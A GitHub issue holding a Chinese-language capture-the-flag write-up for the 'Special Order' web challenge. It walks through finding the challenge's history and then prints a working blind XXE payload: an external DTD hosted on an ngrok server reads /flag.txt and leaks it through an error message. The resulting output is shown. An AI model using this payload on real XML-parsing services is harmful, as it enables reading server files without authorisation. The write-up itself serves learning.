We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
從線索中可以看出是以前的題目重新改過 透過關鍵字:Special Order ctf 可以找到這篇 write up,發現是 XXE https://github.com/Ambrotd/hacktivitycon/blob/master/Special%20Order/Special%20Order.md
如果再拿詳細比賽名稱去 google special order hacktivitycon 可以找到 source code https://github.com/pop-eax/SpecialOrder 還有作者的 blog https://pop-eax.github.io/blog/posts/ctf-writeup/web/2020/08/01/h-cktivitycon-ctf-specialorder/
到處摸索有沒有其他地方可以打,都發現沒有 嘗試了原本的 XXE 發現 xml 還是會解析,只是最後不會輸出結果而已 越想越覺得這邊不對勁,如果要修復幹嘛不整個拿掉,居然還是 parse xml 了
於是找到了 portSwigger,看到這篇 https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages
其中有一招是用外部的 dtd 引起錯誤,然後用錯誤訊息把輸出帶出來 https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages
就照著上面寫的,新建一個檔案放 server
<!ENTITY % file SYSTEM "file:///flag.txt"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>"> %eval; %exfil;aaa
然後去引用這個檔案
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://1101905f73b1.ngrok.io/a.dtd">%xxe; ]> <root> <color>123</color> <size>40px</size> </root>
就過關了 順利拿到 flag
Invalid URI: file:///invalid/flag{i7_1s_n0t_s0_bl1nd3721} , line 3, column 7 (a.dtd, line 3)
The text was updated successfully, but these errors were encountered:
No branches or pull requests
從線索中可以看出是以前的題目重新改過
透過關鍵字:Special Order ctf
可以找到這篇 write up,發現是 XXE
https://github.com/Ambrotd/hacktivitycon/blob/master/Special%20Order/Special%20Order.md
如果再拿詳細比賽名稱去 google
special order hacktivitycon
可以找到 source code
https://github.com/pop-eax/SpecialOrder
還有作者的 blog
https://pop-eax.github.io/blog/posts/ctf-writeup/web/2020/08/01/h-cktivitycon-ctf-specialorder/
到處摸索有沒有其他地方可以打,都發現沒有
嘗試了原本的 XXE 發現 xml 還是會解析,只是最後不會輸出結果而已
越想越覺得這邊不對勁,如果要修復幹嘛不整個拿掉,居然還是 parse xml 了
於是找到了 portSwigger,看到這篇
https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages
其中有一招是用外部的 dtd 引起錯誤,然後用錯誤訊息把輸出帶出來
https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages
就照著上面寫的,新建一個檔案放 server
然後去引用這個檔案
就過關了
順利拿到 flag
The text was updated successfully, but these errors were encountered: